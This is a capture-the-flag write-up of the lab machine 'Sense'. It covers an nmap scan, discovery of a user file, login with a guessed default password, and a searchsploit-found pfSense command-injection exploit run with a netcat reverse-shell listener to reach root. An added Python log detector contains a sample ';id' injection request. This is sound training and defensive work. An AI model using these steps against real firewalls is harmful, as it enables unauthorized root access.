# Sense

### Initial Enumeration

```bash
# Nmap 7.80 scan initiated Fri Sep 27 18:41:07 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,443 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.24s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.3
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.3 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   243.80 ms 10.10.14.1
2   243.69 ms 10.10.10.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 27 18:42:59 2019 -- 1 IP address (1 host up) scanned in 111.85 seconds
```

![](/files/-Lpmr4tbvpgfyyHnH-ii)

Checking out the page, it turns out to be the login interface of `pfsense`, and the default credentials of `admin:pfsense` did not seem to work. So I ran `gobuster` on the URL and found a `txt` file called `system-users.txt`, which contained the username `rohit`; the password was supposed to be `company default`, so I chose to try `pfsense`, and this combination got me into the dashboard.

![](/files/-LpmrE1OBvvFUsPImak3)

As evident from the version information, this is `pfsense 2.1.3`, so I ran this service and version info against `searchsploit` and found one command injection vulnerability.

```bash
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                                | exploits/php/webapps/43560.py
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
```

### User and Root own

So I ran the exploit script with the parameters it required and was able to get a shell as root on the system.

```bash
python3.7 43560.py --username rohit --password pfsense --lhost 10.10.14.8 --rhost 10.10.10.60 --lport 5555
```

```bash
$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.60] 21729
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /root/root.txt
d08c3***
# cat /home/rohit/user.txt
87213***
```
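From the defender's side, both steps above leave traces in the web server's access log. The following is an added example, not part of the original write-up or of pfSense: a small detector that flags a wordlist hit on a `.txt` file and shell metacharacters in the query string of `status_rrd_graph_img.php`. The combined log format, the sample lines, the parameter name `p` and the threshold are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format assumed); not real traffic.
SAMPLE_LOG = """\
10.10.14.8 - - [27/Sep/2019:18:50:01 +0000] "GET /admin.txt HTTP/1.1" 404 345 "-" "gobuster/3.0.1"
10.10.14.8 - - [27/Sep/2019:18:50:01 +0000] "GET /backup.txt HTTP/1.1" 404 345 "-" "gobuster/3.0.1"
10.10.14.8 - - [27/Sep/2019:18:50:02 +0000] "GET /users.txt HTTP/1.1" 404 345 "-" "gobuster/3.0.1"
10.10.14.8 - - [27/Sep/2019:18:50:02 +0000] "GET /system-users.txt HTTP/1.1" 200 106 "-" "gobuster/3.0.1"
10.10.14.8 - - [27/Sep/2019:19:02:10 +0000] "GET /status_rrd_graph_img.php?p=a%3Bid HTTP/1.1" 200 0 "-" "python-requests/2.22.0"
192.168.1.20 - - [27/Sep/2019:19:05:00 +0000] "GET /status_rrd_graph_img.php?p=wan-traffic.rrd HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# client, method, request target, status
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Characters that have no business in a graph/database name but matter to a shell
SHELL_META = re.compile(r"[;|&`$<>\n]")
NOT_FOUND_THRESHOLD = 3  # assumption: tune to the site's normal 404 rate


def analyse(log_text):
    """Return a list of (rule, client, path) alerts for the given log text."""
    not_found = Counter()
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        if status == "404":
            not_found[client] += 1
        # A 200 on a .txt from a client that has been piling up 404s
        # is what a successful directory brute-force looks like.
        elif (status == "200" and parts.path.endswith(".txt")
              and not_found[client] >= NOT_FOUND_THRESHOLD):
            alerts.append(("wordlist_hit", client, parts.path))
        # parse_qsl percent-decodes, so encoded metacharacters are caught too.
        if parts.path.endswith("/status_rrd_graph_img.php") and any(
            SHELL_META.search(k + v)
            for k, v in parse_qsl(parts.query, keep_blank_values=True)
        ):
            alerts.append(("shell_metachar_in_query", client, parts.path))
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```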

### Learning outcome

I need to find better word-lists which are more comprehensive and thorough in terms of research. The ones I used just barely got me through this time.

